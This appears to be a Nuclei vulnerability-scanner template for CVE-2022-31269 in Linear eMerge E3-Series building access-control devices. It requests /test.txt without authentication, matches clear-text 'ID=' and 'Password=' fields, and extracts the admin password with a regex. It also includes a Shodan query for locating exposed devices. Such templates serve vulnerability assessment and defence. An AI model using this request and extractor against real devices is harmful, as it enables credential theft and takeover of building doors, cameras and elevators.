id: CVE-2022-31269 info: name: eMerge E3-Series - Information Disclosure author: For3stCo1d severity: high description: | Admin credentials are stored in clear text at the endpoint /test.txt (This occurs in situations where the default credentials admin:admin have beenchanged.) Allows an unauthenticated attacker to obtain adminicredentials, access the admin dashboard of Linear eMerge E3-Series devices, control entire building doors, cameras, elevator, etc... and access information about employees who can access the building and take control of the entire building. reference: - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html - https://www.nortekcontrol.com/access-control/ - https://nvd.nist.gov/vuln/detail/CVE-2022-31269 classification: cve-id: CVE-2022-31269 metadata: shodan-query: http.title:"Linear eMerge" verified: "true" tags: cve2022,emerge,exposure,packetstorm,cve requests: - method: GET path: - "{{BaseURL}}/test.txt" matchers-condition: and matchers: - type: word words: - "ID=" - "Password=" condition: and - type: word part: header words: - text/plain - type: status status: - 200 extractors: - type: regex regex: - Password='(.+?)'